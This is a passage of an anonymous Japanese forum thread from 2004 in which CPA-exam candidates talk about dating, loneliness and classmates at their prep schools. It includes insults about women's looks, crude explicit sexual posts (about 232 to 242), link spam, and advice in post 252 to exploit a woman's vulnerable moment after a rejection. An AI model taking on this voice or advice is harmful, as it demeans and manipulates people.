おまえら、デブ決定。

136 :一般に公正妥当と認められた名無しさん:04/02/18 20:18 ID:nfUx1Naa
>111
3ヶ月も続かんだろ?

137 :一般に公正妥当と認められた名無しさん:04/02/18 20:38 ID:???
136が真理を言った。

138 :一般に公正妥当と認められた名無しさん:04/02/18 23:41 ID:???
簿記2とか3はかわいー子がいたが、会計士は終わってた。今度から簿記二級にもぐることにした。

139 :一般に公正妥当と認められた名無しさん:04/02/19 01:12 ID:???
/ /  /   / /    ||  |  i  ヽ i
              i /  / /  / / /    ||  ||  |│ |ノス
               |//  / /___, -一ァ|  /! |ト、|│ | | く」
                |,-‐¬  ̄---┘'7 |!  ハ! |,、-┼十|! | | |
          , -‐ ''"  し' '´_ /,ィ二l |ト、/!ヽト、\_ヽ!|!l | ハ |
       ,r/      __   ,イ|リ ヾハ! ヽ!  ,ィ⌒ヾミリノ!/リ  |
      / ||ヽ  -'     / ̄ )` __      |ヒノ:} '` ,イ/ |  |   童貞諸君、乙であります
    ,r '   ヾ、  ,-、____ , イ ̄,r==-      ==-'  レ' /|  |   
  / ヽ    `ーソ  ' | |ト、,ヘ ′""          "" / / || |   
. /    \_  /  | ハ ヽ`゙'ヘ       ' '__. ィ  / / | |  |  
           /   / / |  ヽ 川\    ヾ三ニ‐'′//! |  | |  |
        /    / / 八  \川| |`ト- ..  __ , イ‐ァヘ |  | ||  |!
      /    / / /  \  \ 「`ー- 、    /  .〉  ト、|  ヽ、
     ,イ    /-─=¬ニヘ、_  \   厂\ 厂ヽ /!|   | `ー=ヘ
 -‐  ̄ /─ '  ̄     ├- ヽ\  \ノ\ \ 人 ハ!ヽ ||  |-┤ ヽ
      /          /!‐-- | |\   ト、_`ヽ oヽ  ト、!  ||  |‐┤- ヽ
  // 〉      __ /  ├‐-  ||  | 川-‐  | |  厂7! ハ!  ├:┤  ̄ヽ
  / / ー ─    ̄       ├‐- リ  || ハ!ヘ   | |  ト┤|/′ ヾ,┤   ゙i_
  ‐ '              〉‐-    | / /\ .|o | /ヽ/(′    ∨     \
‐--─ ──-r、___-、    /ー_     {(   '´>、! /ヽ/       |\       \

140 :一般に公正妥当と認められた名無しさん:04/02/19 17:57 ID:???
本当にブスばかりだな。

141 :一般に公正妥当と認められた名無しさん:04/02/19 21:13 ID:???
○原に通っています。
大学では普通に男友達いるし
ナンパされることも多いけど
○原では誰からも声かけられません。
それは私がブスということでしょうか。
同じ受験生と恋愛したいのに・・

142 :一般に公正妥当と認められた名無しさん:04/02/19 23:28 ID:???
俺TAC だけどいい?大原のやつは近眼だから見えてないんだよ、きっと。

143 :一般に公正妥当と認められた名無しさん:04/02/20 00:04 ID:???
俺LEC だけどいい?大原のやつは近眼だから見えてないんだよ、きっと。

144 :一般に公正妥当と認められた名無しさん:04/02/20 00:12 ID:xwhbbFZl
>141
1、ブス
2,すっげーかわいい
3,場違いな露出で、声をかけたらアホと思われる  
   の、どれかだな。

145 :一般に公正妥当と認められた名無しさん:04/02/20 00:22 ID:???
みんな女になんて言って声かけるの?
っていうか学校内での恋愛って多いの?
みんな好きな子いるの?
誰か声かけて〜〜
他は知らないけど○原はかっこいい人けっこういます☆

146 :一般に公正妥当と認められた名無しさん:04/02/20 01:09 ID:ZW0tTcTQ
オレハ
「ハァハァうなじが最高だね」ハァハァ

147 :一般に公正妥当と認められた名無しさん:04/02/20 06:36 ID:4jc2WFJb
>145
彼氏居ない歴何年?

148 :一般に公正妥当と認められた名無しさん:04/02/20 13:26 ID:eMoj58zb
30年

149 :一般に公正妥当と認められた名無しさん:04/02/21 01:03 ID:???
前の席に可愛い子が座っていて
うなじに息吹きかけたい衝動に駆られたよ。
そのくらいなら許されることかな?

150 :一般に公正妥当と認められた名無しさん:04/02/21 01:40 ID:???
許す

151 :一般に公正妥当と認められた名無しさん:04/02/21 21:47 ID:???
税理士を目指しています。
誰か付き合ってください。
http://profiles.yahoo.co.jp/mami_chuchu


152 :一般に公正妥当と認められた名無しさん:04/02/22 14:33 ID:edDQvlqW
さてと・・。

153 :一般に公正妥当と認められた名無しさん:04/02/22 15:23 ID:???
つうか会計士試験なんて自分のスキルアップのための試験だろ?
そのまま監査法人に行く奴はアホ
まぁ資格浪人という名の無職ばっかだから
仕方ないけど

154 :一般に公正妥当と認められた名無しさん:04/02/22 22:48 ID:???
この問題解ける?
http://butuzou.k-server.org/1111.html


155 :一般に公正妥当と認められた名無しさん:04/02/22 23:33 ID:LACCtJm3
スレチガイ

156 :一般に公正妥当と認められた名無しさん:04/02/23 09:32 ID:???
ふられて何にもやる気が出ないわ…

157 :一般に公正妥当と認められた名無しさん:04/02/23 18:17 ID:???
恋人とデートをするのが面倒。勉強の妨げになるんだよね。
そういうのをきちんと考えられないなら別れてほしい。
マジでうざい。

158 :一般に公正妥当と認められた名無しさん:04/02/23 22:29 ID:???
一度は見ておけよ。
http://www.albinoblacksheep.com/flash/you.html


159 :一般に公正妥当と認められた名無しさん:04/02/23 23:56 ID:???
>>157
別れりゃいいじゃん。
俺は別れた。

160 :一般に公正妥当と認められた名無しさん:04/02/24 02:56 ID:TzZjEI9p
同じ勉強してる女の子や男の子と付き合えるもの?私、ライバル視しちゃうんだけど、それって変かしら?

161 :一般に公正妥当と認められた名無しさん:04/02/24 03:01 ID:6u5tiWOu
一緒に頑張ろうという心を持とうぜ

162 :一般に公正妥当と認められた名無しさん:04/02/24 03:07 ID:TzZjEI9p
そっか…!みんな怖そうに見えるから、話かけられたりしても、こっちが先に壁作ってたかも。ありがとね!

163 :一般に公正妥当と認められた名無しさん:04/02/24 03:23 ID:TzZjEI9p
>57
わかる!いつも同じ理由でダメになる。そしていつも後悔すらしない(笑い)


164 :一般に公正妥当と認められた名無しさん:04/02/24 05:33 ID:???
>>157
それはつらいですね。
俺は遠距離恋愛なので月に2,3回のデートと毎晩30分程度の電話。
それくらいでちょうどいいとおもってる。
相手は不満を感じているかもしれないけど。w

>>160
別に変ではないとおもう。
恋人どうしならお互い切磋琢磨できそう。
相手より下になりたくない。頭悪いとおもわれたくない。
そういう気持ちは友達に対する気持ちより強くなる気がします。

165 :一般に公正妥当と認められた名無しさん:04/02/24 06:42 ID:G9O5aqmK
勉強してる奴の方が何かと都合がいい。
そして、余計な心配をしなくていい。

166 :一般に公正妥当と認められた名無しさん:04/02/24 07:03 ID:???
>>159
あんたは受かって欲しい。

>>164
遠距離でそれだけデートできる金があるお前がうらやましい・・・

俺は勉強取るっていったら彼女実家に帰りました。・゚・(ノД`)・゚・。

167 :一般に公正妥当と認められた名無しさん:04/02/24 08:33 ID:0rN2s1z9
やれ女だ男だ言っている奴は受からないね、おまえ等状況を考えろよ。

168 :一般に公正妥当と認められた名無しさん:04/02/24 15:00 ID:???
次落ちたら別れるよといわれますた。

169 :一般に公正妥当と認められた名無しさん:04/02/24 20:13 ID:???
そんなに嫌なら試験受けるな。そうすれば落ちない。
と屁理屈ry

170 :一般に公正妥当と認められた名無しさん:04/02/25 03:19 ID:wEa6LjfO
160>164>
同意。それも一つの愛情の形なのかな??でも相手に思いやりみたいな気持ちもなくなったら、もうその愛より大事なものができたってことになるんだよね?

171 :一般に公正妥当と認められた名無しさん:04/02/25 03:23 ID:wEa6LjfO
167>
そういう君はもうここには来なくていいよ。
愛もなくなったら、君には何が残るんだい?その過酷な状況だけか?
それはたいへんだ!!!!!!

172 :一般に公正妥当と認められた名無しさん:04/02/25 07:05 ID:???
愛だろ愛

173 :一般に公正妥当と認められた名無しさん:04/02/25 08:43 ID:???
「タフでなければ生きていけない、
優しくなければ生きる資格がない」
   レイモンド・チャンドラー

174 :一般に公正妥当と認められた名無しさん:04/02/25 17:39 ID:???
【泣怒】彼女にふられてしまいました。
http://school.2ch.net/test/read.cgi/govexam/1058159347/l50

175 :一般に公正妥当と認められた名無しさん:04/02/25 22:15 ID:???
2年本科クラス同士で付き合って2年後まで付き合っているかどうか。。。
途中で分かれたらつらいな

176 :一般に公正妥当と認められた名無しさん:04/02/26 00:58 ID:???
学校の人たちなんて
恋愛対象外なんですけど・・
ただの受験仲間としか思えない。

177 :一般に公正妥当と認められた名無しさん:04/02/26 01:18 ID:???
男の一方通行

178 :一般に公正妥当と認められた名無しさん:04/02/26 22:07 ID:???
キタ━━━━━━(゚∀゚)━━━━━━━!!!!!
http://sosweet.rompl.com/?freepi

179 :一般に公正妥当と認められた名無しさん:04/02/27 02:13 ID:???
諸君
死んでから休めばいい

180 :一般に公正妥当と認められた名無しさん:04/02/28 00:30 ID:cCGc4f+v
同じ学校でも付き合えるような人がいればいいなぁ…。何かと求めるもの多いから、無理かもってあきらめてるよ。
恋も一時的にはすごい起爆剤になるけど、その後がネ…。1人でアガッテるからフラレルか、冷めるかした時のあの気持ち…。
あぁ。。。

181 :一般に公正妥当と認められた名無しさん:04/02/28 01:13 ID:oRZEweUf
ちょっと話し変わるけど、専門での交友関係はどうしてる?
大卒で本科の1年生コースに入ってるけど、周りの大卒連中は
名前の聞いたことない底辺私立卒ばっかで正直辛い、ちなみに
俺は上位国立卒。
学校ではそいつらと昼飯食ったりしてるけど、なんせ勉強する
気が無いのか授業もかなり休むは、テストも点悪すぎ又は受け
てすら無いで散々な奴らばっかり。でも同年代がそいつらいな
いから我慢してるけど。勉強するテンションがさがってまう。
でも一人で昼飯食うのも寂しいしー、あー誰か助けてちょんまげ!

182 :一般に公正妥当と認められた名無しさん:04/02/28 01:18 ID:g2aMiUz6
俺は早稲田だけど知り合いゼロ、正直知り合いなんて必要無い。

183 :一般に公正妥当と認められた名無しさん:04/02/28 01:21 ID:???
>>181
上位国立卒だろうがなんだろうが
無職であることは同じ
世間的に見て社会不適合者であるのは限りない
つうかいいとこに就職できなかった時点で終わり
1年コースなんて他の予備校からの移籍者じゃないと
受からんって

184 :一般に公正妥当と認められた名無しさん:04/02/28 01:45 ID:???
>>181
1年コースで受かるのはごく少数。
周りの連中は合格はおろか途中で脱落するとおもうよ。
大学受験のときのほうがはっきりいってテンションは高い。
そういうものだとおもってまあがんばってくだされ。




185 :一般に公正妥当と認められた名無しさん:04/02/28 08:41 ID:???
私は処女

186 :一般に公正妥当と認められた名無しさん:04/02/28 11:08 ID:???
好きな子おるけど、本当に好きなのかわからない。
その気持ちが弱さから芽生えてしまったものなのか
だとしたら、受かってから 変わってゆく自分を見て
その子を傷つけてしまうんではないかと。
確かに、心の支えが欲しくなるときがある。去っていった
元彼女を忘れられない自分がいる。仕方ないよ、この試験で
自信を揺らがせて いっぱい×2になってる俺を見てるのが
辛かったんだろう。だからこそ一人で戦って強くならなきゃ
胸張って歩けるようにならなきゃと思うんだ。男が誰かに守って
もらうと言うのは本質的に自分自身が辛い事だと俺は思う。
もう女に情けない自分を見せるのだけはごめんだ。
一人前になって 心から愛してると言えるようになるまで
迷わず俺についてこいと言えるようになるまで 心の中に
大切にしまっておこうと思う。

187 :一般に公正妥当と認められた名無しさん:04/02/28 11:13 ID:r7DkZiYh
正直しんどい

188 :一般に公正妥当と認められた名無しさん:04/02/28 11:35 ID:???
>>186
恋愛に関して言えば男だからとか女だからとかいう考えは古いよ。
自分の信念を貫くというのならそれもいいとおもうけどね。
おれはそういうのしんどいので自然体でいる。
場合によっては彼女に養ってもらうことも考えている。

189 :一般に公正妥当と認められた名無しさん:04/02/28 15:44 ID:oS9f1eRX
ただ弱さ、不安、刺激を求めて付き合いたいと思う事もあるが、辛い時期に支えて
くれた女は大事にしようと思う。自分が良い時に付き合った女とは状況が悪くなれば
ダメになる。人間、山有り谷有りだから・・・。
刹那的恋愛なら、それで良いが。
弱さからでもマジで惚れたなら、それもいいんじゃないか?

190 :一般に公正妥当と認められた名無しさん:04/02/28 16:47 ID:U+LauGLb
受かったら死ぬほど遊べる、それまで我慢だ。

191 :一般に公正妥当と認められた名無しさん:04/02/28 18:24 ID:???
>>190
受かったら遊べるなんてのは幻想だよ。
受かってからがさらに大変。でもその道を選んだんだろ?
恋愛なんてものは永久にできないよ、残念ながら。

192 :一般に公正妥当と認められた名無しさん:04/02/28 19:07 ID:W61qhiVz
>>186
あんた偉いよ。
早く一人前の男になれ。
それまでカンバレ。

193 :一般に公正妥当と認められた名無しさん:04/02/28 19:16 ID:A1pU5jmp
ほとんど禁欲生活だ...

194 :一般に公正妥当と認められた名無しさん:04/02/28 23:07 ID:FRqvwro4
歯グソ 臭い〜


























195 :わーーい!!:04/02/28 23:42 ID:???
 
好きな女の子からやっとメールが来たYo!
 
>すいませんが、もうメールしないでくれる?
>きもいんですけど、まじで・・。
 
だって!!
 
 
まいったな、たて読みさせるとはね!!

196 :一般に公正妥当と認められた名無しさん:04/02/29 01:30 ID:???
>>195
めでたい奴だな。

197 :一般に公正妥当と認められた名無しさん:04/02/29 01:41 ID:???
好きな子がいるんだけど
かわいい子なんだけど
アプローチしてもいいものか・・
他に好きな人がいるようなんだけど

198 :一般に公正妥当と認められた名無しさん:04/02/29 02:10 ID:7kcf8Y3r
http://chanpu2.hp.infoseek.co.jp/


199 :一般に公正妥当と認められた名無しさん:04/02/29 02:11 ID:you+fe3C
因果神理教

教祖
デビル・トムボーイ(デビル倶楽部創設者、日本発狂の会会長)

競馬ゴッドハンド
すま〜とが→る正大師(治癒省大臣。教祖秘書で展開神)
スタイリッシュ春日部正大師(建設省大臣。教団最古参幹部でドリームティップスターを管轄、データ神)
戦国ハイスクール信長正悟師(自治省大臣。目つきがあぶない、タイム神)
STOP JAP正悟師(諜報省大臣。武闘派リーダーでテロ・ゲリラ活動を指揮、要注意人物。騎手神)
ライト・サイダーΒ正悟師(法皇官房最高幹部。影の最高幹部と目されJRA関係者。血統神)

http://gamble2.2ch.net/test/read.cgi/keiba/1077900575/

200 :一般に公正妥当と認められた名無しさん:04/02/29 02:38 ID:GzEXk1mx
200オッパイ 簿記子ちゃん大好き

201 :一般に公正妥当と認められた名無しさん:04/02/29 02:42 ID:7kcf8Y3r
http://chanpu2.hp.infoseek.co.jp/

202 :一般に公正妥当と認められた名無しさん:04/02/29 03:19 ID:tH9IOKaC
186>
女の子ってホントに好きになったら、その人の弱さも全部包んで守ってあげたくなる。
多分、古今東西、究極的にはそんな気持ち。そこに条件はあっても。でも、女にとって
一番困るのが、自分の愛情について何ら意義を考えこまれたり、自分の強いとこだけを
彼女に見せて、もっと好きになってもらおうとすること。人間だから、強さも弱さも
あって当然だもの、強さだけじゃなくて弱さも知ることも大事なんじゃなくて?
傷つく危険なんて、後の話だと思うよ。
でも、その前に多分、相手にチャント向合えないのは、元の彼女
をまだ好きだからなんじゃないの?それならそれで、早く手引いてあげないと、
その子を今傷つけることになるんじゃない?一人前になったって、そこではまた違う苦労
も待っていると思いますよ。

203 :一般に公正妥当と認められた名無しさん:04/02/29 03:24 ID:tH9IOKaC
97>
他に好きな男がいるなら、やめれば?フラレルだけ、
無駄な体力。


204 :お前らの頭が上がらない運営様。:04/02/29 10:17 ID:ZItUBsKg
横浜校ですが、なんか僕の事キモイっていう噂が
流れてるんですがヤメテください。
たまたま女の子の後ろで携帯取り出したら
こっちを確認して、足早に去っていく始末です。
迷惑です。

205 :一般に公正妥当と認められた名無しさん:04/02/29 13:26 ID:3kspcge9
そりゃ、迷惑だな。ご愁傷様です。

206 :一般に公正妥当と認められた名無しさん:04/02/29 14:00 ID:???
好きだった受付事務のお姉さんが寿退社だってよ

207 :一般に公正妥当と認められた名無しさん:04/02/29 16:32 ID:BukSuuPW
>>204
君は終わってる。


208 :お前らの頭が上がらない運営様。:04/03/02 09:57 ID:y0RFVP24
おいカスども、オベンキョしてkっか?w
人様の迷惑にだけはなるなよww


209 :一般に公正妥当と認められた名無しさん:04/03/02 15:43 ID:???
ヤパーリ通信がいいんでないのかい?
恋愛はおいといてさ。

210 :一般に公正妥当と認められた名無しさん:04/03/02 19:33 ID:ai5H7ix8
うるせーばーか。

211 :一般に公正妥当と認められた名無しさん:04/03/02 19:42 ID:???
>>210
ふられたか?

212 :一般に公正妥当と認められた名無しさん:04/03/02 21:37 ID:???
落ちたんだろうよ。

213 :一般に公正妥当と認められた名無しさん:04/03/02 21:50 ID:bM6E2ijo
        /⌒ヽ⌒ヽ
               Y
            八  ヽ
     (   __//. ヽ,, ,)
      丶1    八.  !/
       ζ,    八.  j
        i    丿 、 j
        |     八   |
        | !    i 、 |
       | i し " i   '|
      |ノ (   i    i|
      ( '~ヽ   !  ‖
        │     i   ‖
      |      !   ||
      |    │    |
      |       |    | |
     |       |   | |
     |        !    | |
    |           | ‖
   /   ●     ●  ヾ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
  /         ∀      ヽ   <   どーでもいいんだよ!!
                      \__________





214 :一般に公正妥当と認められた名無しさん:04/03/02 23:43 ID:4StjliH9
横浜校は、本当怖い。
なにが怖いって女子便所で言っている悪口が全部外に筒抜け。
しかも気づいてんだか気づいてないんだかそれでも平気で悪口いう。
横浜校はみんな仲良くしてても、お互い信頼してないんじゃねえ?
実際入門期に仲良かった集団の女の子がある日ポツンと一人外れたの見たことある。
どんな訳があるにせよ、見てて痛々しかった

215 :一般に公正妥当と認められた名無しさん:04/03/02 23:57 ID:BBdjDvrC
女の集団は怖えぇぇぇぇぇぇぇ。

216 :一般に公正妥当と認められた名無しさん:04/03/03 00:01 ID:???
なんかギスギスして嫌だな。
でもまあ専門学校での友人などおまけみたいなものでしょ。
人間関係円滑じゃなくても気にしない気にしない。

217 :一般に公正妥当と認められた名無しさん:04/03/03 00:37 ID:???
割り切りも大切ということか。

218 :一般に公正妥当と認められた名無しさん:04/03/03 02:07 ID:???
すーすきすーすきすー

219 :一般に公正妥当と認められた名無しさん:04/03/03 03:27 ID:???
   ∧_∧             (´⌒  ⌒  ⌒ヾ
   ( ;   )           (\'⌒ ; ⌒   ::⌒  )
    ( ̄ ̄ ̄ ̄┴-      (´     )     ::: )
     |  (    *≡≡≡≡≡三(´⌒;:    ::⌒`) :;  )
    /  /   ∧   \    (⌒::   ::     ::⌒ )
    / /   / U\   \   (    ゝ  ヾ 丶  ソ
   / / ( ̄)  | |\  ( ̄)   ヽ  ヾ  ノノ  ノ
  / ( ノ  (   | |  \ ノ (
⊂- ┘(    ) └--┘ (    )
     UUUU      UUUU


220 :一般に公正妥当と認められた名無しさん:04/03/03 04:05 ID:RDk5BaHY
ありえねーよ。
30年くらい昔じゃアリとオヤジは言ってるけど。

221 :一般に公正妥当と認められた名無しさん:04/03/03 09:32 ID:???
TACにいる女はTACの中でのみ女であって下界では女として認識されない。

222 :一般に公正妥当と認められた名無しさん:04/03/04 15:36 ID:???
タイ━━━━||Φ|(|´|Д|`|)|Φ||━━━━ホ
http://www2.strangeworld.org/emu/PSX/

223 :一般に公正妥当と認められた名無しさん:04/03/04 22:29 ID:???
>222
はブラクラだとうちのゾヌが申しております。

224 :一般に公正妥当と認められた名無しさん:04/03/04 22:34 ID:hQDdHHte
>>221
男の方も同様。


225 :一般に公正妥当と認められた名無しさん:04/03/05 00:41 ID:sax1/p8r
>221
こういう奴に限って、えらい部スとこっそり付き合っていたりする。
俺の知り合いにもいる。

226 :一般に公正妥当と認められた名無しさん:04/03/06 14:15 ID:lvOIG71/
助けてくれ。

227 :一般に公正妥当と認められた名無しさん:04/03/06 16:31 ID:???
>>226
どうした?

228 :一般に公正妥当と認められた名無しさん:04/03/06 19:12 ID:sUGnywvJ
恋の末期。

229 :一般に公正妥当と認められた名無しさん:04/03/06 20:29 ID:RyRm19VY
税務会計の勉強している自分に自信をもてない。
夢というほど高尚なものでもないから、頑張ってると思われない…
(楽な)事務の人間がやってることじゃん、とかそんな感じ…

230 :一般に公正妥当と認められた名無しさん:04/03/06 20:52 ID:???
たしかに税金経理会計の仕事って夢がないよね。
会計士目指しているけど仕事として割り切ってる感じ。
収入もステータスもそこそこいいし。
仕事以外のプライベートで充実してたらまあいいよ。


231 :一般に公正妥当と認められた名無しさん:04/03/06 20:53 ID:O2kUD5KR
会計士の勉強中に告白されたら付き合う?
もちろん受験生であることを知っていて、
時間がないことを理解している人だとして。

232 :一般に公正妥当と認められた名無しさん:04/03/06 21:22 ID:???
本命の彼女がいることも理解してくれるならば
セクフレとして付き合うことは可能w
こんなこと考えてるおれは打算的で嫌な人間だなあ・・・

233 :一般に公正妥当と認められた名無しさん:04/03/06 21:24 ID:???
セフレ?!結構公認会計士受験生って暇なんですね...

234 :一般に公正妥当と認められた名無しさん:04/03/06 21:30 ID:8Pq0U0rR
セクフレもめんどくさいよ。場所さがさなきゃなんないし。できればタックのトイレに一つ広い個室を作ってもらって(立ちマンでいい)勉強の合間ヤリたいときにそこでやれるのが一番楽なんだけど。

235 :一般に公正妥当と認められた名無しさん:04/03/06 21:31 ID:8Pq0U0rR
できればタックのトイレに一つ広い個室を作ってもらって(立ちマンでいい)勉強の合間ヤリたいときにそこでセクフレとやれるのが一番楽なんだけどな〜。

236 :一般に公正妥当と認められた名無しさん:04/03/06 21:47 ID:???
セクフレとの関係は月に2回程度が理想。
>>234-235のいうようにいつでも簡単にできるのもいいけど
それだと勉強に身が入らなくなるおそれがある。
あと同一人物と関係続けるのではなく
1ヶ月単位で他の人と交代するのが理想だね。
変に情が移っちゃったりするからなあ。w

237 :一般に公正妥当と認められた名無しさん:04/03/06 21:49 ID:???
まあそれだと風俗いけよ、という話になるのか・・・w
風俗も素人も病気が怖いので結局本命の彼女以外とはもうしない

238 :一般に公正妥当と認められた名無しさん:04/03/06 21:52 ID:???
TACの建物のどこかでこっそりヤったことのあるカップルとかいそう

239 :一般に公正妥当と認められた名無しさん:04/03/06 22:20 ID:???
少なくともトイレの個室で自慰にふけったことある香具師はいるだろう。


240 :一般に公正妥当と認められた名無しさん:04/03/07 00:04 ID:XeHRSupX
そんなもんはいらねー。
俺はもっと純粋だ。

241 :一般に公正妥当と認められた名無しさん:04/03/07 02:35 ID:IjzbuM2z
ここだけの話、O原ではやったことあるよ!


242 :一般に公正妥当と認められた名無しさん:04/03/07 08:52 ID:QBf3dcL0
好きな彼女がいた時は幸せだったが勉強時間はかなりへった。
いろいろあって別れたが新しい彼女とは前と違って付き合うの面倒臭い。
やっぱ適当にかわいい女と勉強の合間トイレで10分程度パコパコできればそれでいい。生あったかい中にドックンドックン出したい

243 :一般に公正妥当と認められた名無しさん:04/03/09 00:38 ID:9TCAfC7o
 O原の京都校の屋上は人が来そうにないから、暗くなるとそういうことしてるのがいそうだ。
 昼間は屋上で理論の勉強をしてるのがいるから無理だけど。

244 :一般に公正妥当と認められた名無しさん:04/03/09 23:04 ID:2z1RZvG6
あ〜なんか気になる子がいるけど…同じ専門で同じコース。

神様勇気を下さい!!!!!!!!!!!!!!!!!!

245 :一般に公正妥当と認められた名無しさん:04/03/10 01:01 ID:5qCfsKil
>>197
同士よ。その後どうしてる?

246 :一般に公正妥当と認められた名無しさん:04/03/10 02:28 ID:???
>244
>245
同士かよ。
彼女からは好きな人の相談をされてまつ。
なんと鈍感な女だ
アプローチしているつもりなんだが

247 :一般に公正妥当と認められた名無しさん:04/03/10 02:32 ID:???
>>246
そりゃお前、そんな相談されてる時点で恋愛対象外ってコッタ
今までの統計によると99、9%振られるから諦めろ

248 :一般に公正妥当と認められた名無しさん:04/03/10 02:50 ID:???
>>247
んなんで諦めきれたら
誰も悩まねーんだよ
彼女は何年も片思いしているらしい
そろそろ諦めるかもしれない。
そこで俺の出番だ

249 :一般に公正妥当と認められた名無しさん:04/03/10 03:09 ID:???
>>248
そうか・・じゃあ頑張れ(*^ー゚)b

250 :一般に公正妥当と認められた名無しさん:04/03/10 04:00 ID:???
>249
なんかアドバイスくれ

彼女はかなり天然だ
成績は優秀なのに・・俺の気持ちには気づかない

251 :一般に公正妥当と認められた名無しさん:04/03/10 06:27 ID:???
恋愛問題は難しいなあ・・・
会計士試験が易しく思えてくるよ

252 :一般に公正妥当と認められた名無しさん:04/03/10 07:14 ID:???
>>250
しょうがないな。
とりあえずその女に告白させろ。
でうまくいったら諦めろ。
うまく逝かなかったら振られたと相談?するはずだからそこに付け込め。
人間気が滅入っている時は誰かの支えが欲しいもんよ。

ガンガレ(゚∀゚≡(゚∀゚≡゚∀゚)≡゚∀゚)

253 :一般に公正妥当と認められた名無しさん:04/03/10 09:22 ID:???
> 人間気が滅入っている時は誰かの支えが欲しいもんよ。

 禿同だな。彼女が弱っているときには話を聞いてあげなさい。
自分の話を必要なときにいつでも聞いてくれる男に惚れてしまう
女は多い。話しかけられているということは少なくとも嫌われてはいない。
速攻ではなく、じっくりいくのはどうか?

254 :一般に公正妥当と認められた名無しさん:04/03/12 00:05 ID:???
かゆいよー

255 :一般に公正妥当と認められた名無しさん:04/03/12 23:51 ID:3pRSMFul
うつりました?

256 :一般に公正妥当と認められた名無しさん:04/03/13 00:44 ID:ilqetrEQ
俺思うんだけど…
彼女できたやつや女友達に恵まれてるやつみると、
なんか息苦しくみえる。なんかいつも他人の視線に囲まれてる
気がする。まぁ俺はしょぼいから誰も視線に入らないけど。

257 :一般に公正妥当と認められた名無しさん:04/03/13 00:50 ID:???
>>256さんにこっそり憧れてる人もいるかもよ

258 :一般に公正妥当と認められた名無しさん:04/03/13 01:01 ID:5Z8TK/Zi
>>253君はメンズ雑誌の読みすぎじゃないかね?

259 :一般に公正妥当と認められた名無しさん:04/03/13 01:48 ID:???
むしろ、俺は他人の視界に入るのが苦痛な訳だが。

260 :一般に公正妥当と認められた名無しさん:04/03/13 03:41 ID:???
>>259
受験生ならともかく社会人になるとつらいよね
円滑な人間関係強制されるところがある
そういうのが苦にならないのは一種の能力だな
就職採用ではそういうところをみられるわけだが…

261 :一般に公正妥当と認められた名無しさん:04/03/13 12:59 ID:Lk+KbvBp
伯母から、「受かったら結婚相手紹介してあげる」と発破をかけられたんだけど、
会計士補の段階で結婚してる人っているの?

262 :一般に公正妥当と認められた名無しさん:04/03/13 13:28 ID:8dW7u0ZB
>>261
いないわけないだろ。

263 :一般に公正妥当と認められた名無しさん:04/03/13 13:36 ID:Va35OX70
>260
でも、専門って、異常な空気あるから存在消したいという気持ちもわかるけどな。
社会人は見て見ぬふりするが、専門のヤシは露骨にカップルとか見るだろ?


264 :一般に公正妥当と認められた名無しさん:04/03/13 15:14 ID:lFZ7Kn8u
みんなはどんな人がタイプ?
俺は頭いい子
かつ童顔でかわいらしい子

265 :一般に公正妥当と認められた名無しさん:04/03/13 15:57 ID:3E1v1Xi4
>>264
小倉優子先生

266 :一般に公正妥当と認められた名無しさん:04/03/13 17:04 ID:/la4Lq4I
美人さん

267 :一般に公正妥当と認められた名無しさん:04/03/13 18:57 ID:++PQNcZv
学生なんだけど初対面の女性との会話
女「普段何しているの?」
漏れ「音楽聴いたり、映画見に行ったり・・・(勉強だよ。)」
女「就職はどうするの?」
漏れ「特にやりたいことはなくて・・・(士業、駄目なら経理だよ)」
女「・・・じゃあ夢はあるの?何か面白いことやってる?」
漏れ「別に・・・(士業は夢ちゅうかな?)」

漏れは勉強していること言いたくない気分になってしまう・・・
ダサいというか暗いというか、そんな印象をもたれるのでは、と思ってさ。

268 :一般に公正妥当と認められた名無しさん:04/03/13 22:57 ID:ilqetrEQ
>>267
女を脅え過ぎ
女なんて最初の対面で9割近く印象が決まってるんだ。
会話なんてSEXの前のデートみたいなもん。
最初からデキレース。

269 :一般に公正妥当と認められた名無しさん:04/03/13 23:07 ID:???
逆を言えば、ダメな奴はどこまで行ってもダメという事だ。
俺には、右手も左手も電卓もある。

ああ、人生って素晴らしい。

270 :一般に公正妥当と認められた名無しさん:04/03/14 07:04 ID:EmsW0zgK
>268
おまえってそんなにイケメンズ?ぶっちゃけ?

271 :一般に公正妥当と認められた名無しさん:04/03/14 21:55 ID:U50VPMp1
>>261
結婚して子持ちで職歴なしの30過ぎって強者もいる。

272 :271:04/03/14 21:56 ID:U50VPMp1
会計士補じゃなくて受験生でね

273 :一般に公正妥当と認められた名無しさん:04/03/15 02:39 ID:???
>>271
そういう人ってどういう結婚式だったんだろ。
披露宴とかしてないのかな。籍入れただけとか…。

274 :一般に公正妥当と認められた名無しさん:04/03/16 01:09 ID:icT2Rsfe
スレ違いかもしれませんが相談させてください。
わたしが今付き合ってる人も受験生です。
最近やっと資格の受験の大変さを分かってきました。
本当はすごくいっぱい会いたいけど、彼の重荷になりたくないから
わたしからは極力言うことを避けて、一人の時間を充実させようと頑張ってます。
メールとかも勉強の邪魔になったら…と思うとなかなか送れなかったりします。

そこでみなさんに聞きたいのですが、
言われたり、されたりして嬉しいこと・嫌なことは何ですか?
そのほかにもアドバイスなどいただけたら嬉しいです。
ちなみにわたしは大学生です。


275 :一般に公正妥当と認められた名無しさん:04/03/16 04:29 ID:kJ94AsPv
セックスすると記憶力落ちる(少なくとも前日・当日の勉強内容は忘れてしまう)から、まじ彼女うざい。

276 :一般に公正妥当と認められた名無しさん:04/03/16 04:45 ID:???
>>275
それはオナニーの場合にも妥当するのかが問題となる。
思うに、セックスをすると記憶力が落ちるのは
既習の内容についての記憶を維持すべき脳の部位で
彼女とのセックスによる快楽が無意識のうちに反芻されるからである。
とすれば、単なる性欲処理の行為に過ぎないオナニーでは、
刹那的な脳内の占有こそあれ、それによる忘却は生じないと
解すべきである。
                                   以上

277 :一般に公正妥当と認められた名無しさん:04/03/16 08:08 ID:FMOCoAQp
>>274

俺の場合、予備校では落ちこぼれだからかもしれないが、

彼女にされて嫌なことは、
・合格することを前提にいろいろ話をされること
・またその延長として、彼女に、彼女自身のことより、気を遣われること。

逆にうれしいことは、
・「落ちてもいいから」と言ってくれること。
・受験とは関係ないところで自分を好きでいてくれること。

かな?

278 :一般に公正妥当と認められた名無しさん:04/03/16 08:37 ID:CMSwgIT8
彼女がウザイと思って別れたがいないとやっぱ淋しいよ

279 :一般に公正妥当と認められた名無しさん:04/03/16 14:42 ID:UrDjsH2j
274です。
レスありがとうございます!!

